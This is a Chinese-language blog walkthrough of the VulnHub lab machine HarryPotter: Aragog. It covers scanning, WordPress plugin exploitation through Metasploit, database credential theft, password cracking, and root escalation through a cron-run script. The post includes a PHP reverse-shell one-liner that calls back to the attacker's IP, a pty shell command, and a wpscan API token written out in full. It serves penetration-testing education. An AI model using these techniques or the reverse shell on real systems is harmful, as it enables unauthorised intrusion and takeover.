作者名：Demo不是emo?

主頁面鏈接：主頁傳送門
創作初心：對于計算機的學習者來說，初期的學習無疑是最迷茫和難以堅持的，我也剛接觸計算機1年，也在不斷的探索，在CSDN寫博客主要是為了分享自己的學習歷程，學習方法，總結的經驗等等，希望能幫助到大家
座右銘：不要讓時代的悲哀成為你的悲哀
專研方向：網絡安全，數據結構

每日emo：人們感到委屈的時候通常就說睡了

?

?今天的博客內容是HARRYPOTTER: ARAGOG (1.0.2)教程（簡單難度），靶場環境來源于VulnHub,該網站有很多虛擬機靶場，靶場平臺入口在這，推薦大家使用，大家進去直接搜索HARRYPOTTER: ARAGOG (1.0.2)就能下載今天的靶場了，也可以找我拿，開始對今天靶場的介紹

這是哈利波特vm系列的第一個靶場，總共有三個靶場，其中隱藏了8個魂器，今天這個靶場中隱藏了兩個，意思就是今天的靶場有兩個flag，話不多說我們來見識見識

靶場地址HarryPotter: Aragog (1.0.2) ~ VulnHub

目錄

一：攻擊準備

二：信息收集

?1.http服務探測

2.wpscan工具?

?3.msf獲權

三.最終提權?

?1.數據庫權限

2.用戶權限

3.root提權

四：拓展?

---

一：攻擊準備

直接在vbox導入就可以，如果出現了報錯，就把啟用usb控制器關掉就可以正常打開了

這里除了到vulnhub下載到的目標虛擬機環境，還需要一臺kali，并且兩臺處于同一網段（可以都用橋接模式），虛擬機管理設備用vm和virtual均可，我這里就用virtual來給大家演示了，如下面這樣就是搭建完成了，具體搭建過程就不多講了，不懂得也可以私信問我?

?（因為我這是校園網，有防護所以c段不同，這里都用橋接模式即可，而且靶機也顯示了ip地址，只要能ping通就可以進行靶場操作了）

二：信息收集

?這里看到，我的kali攻擊機的ip是172.21.100.73，而目標機器的ip是172.21.122.235，既然知道了對方的ip，我們就直接用nmap詳細掃描一下，掃描結果如下：

?1.http服務探測

根據上面的掃描結果可以看到對方開啟了22端口（ssh服務）和80端口（http服務），因為ssh需要用戶名等敏感信息，所以我們就先探測對方的http服務，即通過目標的ip訪問目標搭建的網頁，訪問結果如下：

可以看到這個頁面內只有一張圖片，而且在f12開發者審查元素里面也沒有發現異常，在靶場之中看到圖片，大部分都涉及了隱寫術，這里我們用wget命令把圖片下載到本地再輸入steghide工具（一款開源的隱寫工具）使用info參數查看圖片，命令如下：

steghide info harry_potter_1.jpg

具體操作如下：

可以看到提取圖片數據時需要密碼，我們并沒有密碼，隱寫術的探索就只能暫停了，所以想要繼續探測http服務就只能找敏感目錄，這里我們使用kali?自帶的dirsearch目錄爆破工具來探測目錄，命令如下：

dirsearch -u "172.21.122.235" -e *

探測結果如下：

可以看到這里掃出來目錄中，/index.html，/javascript, /server-status,/blog下的部分目錄，并且出現了wp-login.php，這也說明了這是一個wordpress的cms框架，這些才可以訪問，我們依次嘗試，果然在blog這個頁面發現了作者給出的提示，提示如下：（這里其他的訪問頁面就不展示了，太多了）

就是這樣一個頁面，因為全是英文，所以我們也可以來翻譯一下?

這里大家能看明白了吧，他提示了這是一個wordpress站點，這也印證了前面我們的猜想，同時，這個blog頁面應該也是wordpress搭建的根目錄，

2.wpscan工具?

我們這里還是用kali自帶的工具wpscan來進一步獲取信息，這是一款專門用來探測wordpress站點漏洞的工具，還可以檢測wordpress站點用的插件存在的漏洞?，但是這款工具wpscan規定掃描漏洞時，需要帶上token值，才能顯示出漏洞詳細信息。這個token只需要去他的官網注冊一下再登錄就可以拿到了，如果不帶token值，不會顯示漏洞信息

這里拿到了token值 ，再依次輸入下面指令（把ip換成你們自己攻擊機的ip）即可

檢測wordpress站點的漏洞 wpscan --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ --url=http://172.21.122.235/blog檢測wordpress站點所用插件的漏洞 wpscan --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ --url=http://172.21.122.235/blog -e vp

站點漏洞檢測結果如下：

可以 發現該站點的插件中有很多漏洞，而且都是關于file?Manager的，所以我們直接去msf上看看有沒有對應的漏洞利用工具

?3.msf獲權

直接打開kali的msfconsole，這個就不用介紹了吧，再使用search命令查找可以利用的工具，查找結果如下：

可以看到有四個結果，我們使用第二個，因為這個名稱正是我們剛才探測出來的4個漏洞之一，use 1進入到該工具內，再使用info命令查看需要配置哪些東西

?可以看到這里需要配置rhost（目標主機），targeturl（目標網址），這個目標網址會自動跟前面的目標主機拼接，所以我們直接把rhost設置為靶機的ip，targeturl設置成/blog即可，這里因為使用的是反向，所以還需要配置自己的主機ip，再運行即可，效果如下：

可以看到，這里我們成功拿到了網站權限，第一個魂器就在家目錄的hagrid98目錄下

?這段亂碼一看就是base64格式，我們直接拿去在線站點解壓，解壓結果如下：

1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets

翻譯：1：里德爾的日記本被哈利在密室中摧毀

三.最終提權?

?1.數據庫權限

?前面獲得的是網站權限，而且第二個魂器還沒拿到，所以我們繼續探索，wordpress用戶會在mysql數據庫中存儲信息，在/etc/wordpress里可以打開config-default.php。這里記錄了MySQL的用戶名密碼，可以用于登錄數據庫

注意：登錄數據庫之前得首先得獲取一個tty shell，不然我們在數據庫中的命令就看不到回顯（可以理解為將非交互式shell變成了交互式shell），輸入下面命令即可拿到tty shell?

python3 -c 'import pty; pty.spawn("/bin/bash");'

步驟如下?

?像上面這樣就是拿到了tty 權限，接下來就是根據上面拿到的mysql的賬密來嘗試遠程登錄了

?

可以看到這里我們成功登陸了目標的數據庫，wordpress數據庫保存的用戶名和密碼一般都放在wp_users表里面的，我們直接查找里面的內容試試?

成功拿到了用戶名和密碼，我們將密碼拿去md5在線站點解密，解密的結果如下：

password123

2.用戶權限

?因為我們剛才在數據庫中拿到了賬密，最開始的信息探測中又發現目標開啟了ssh服務，所以我們直接嘗試遠程登錄ssh服務，步驟如下：

成功拿到用戶權限，現在我們就該考慮怎么提升為root權限了

3.root提權

?

?這里我們嘗試了查找了一下作者有沒有留下可以sudo提權的工具和歷史命令，都沒有發現，那就很可能是敏感文件了，我們先看看bak備份文件

成功發現了一個以sh為后綴的文件，相信大家平時沒少看到此類文件吧，此類文件大多都是腳本，我們用cat再仔細看看

這個腳本的大概意思是，把上傳的文件復制到tmp這個目錄里，即拷貝文件?，說明這個文件每過一段時間就會執行，推測應該被寫入了計劃任務，這里我們嘗試建立一個反彈shell的腳本并通過它這個計劃任務來執行

在tmp文件下創建反彈shell的php腳本并命名為a.php，腳本代碼如下

<?php $sock=fsockopen("172.21.100.73?",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

因為我們猜測有一個計劃任務會不斷執行剛剛我們找到的.backup文件，所以我們把執行腳本的命令也寫入該文件內，讓其不斷執行腳本，加入代碼后如下?

?這里的/usr/bin/php是php的執行文件的目錄，這樣才能執行php文件，可能有的同學執行文件位置不一樣，所以就需要找一下了

?再新開一個終端，監聽9999端口，不到一分鐘就可以接收到shell了，可以看到是root用戶了已經

四：拓展?

這里我們也可以來查看一下計劃任務，進一步驗證我們的猜想

可以看到，root下確實存在了一個計劃任務來執行剛才那個腳本文件 ，給自己點個贊

到這里今天的靶場就全部結束了，如果你看到這里了希望你也能給自己點個贊，最后，感謝大家的閱讀，有什么問題隨時都可以問評論或私信我，加油哇

總結

以上是生活随笔為你收集整理的【VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。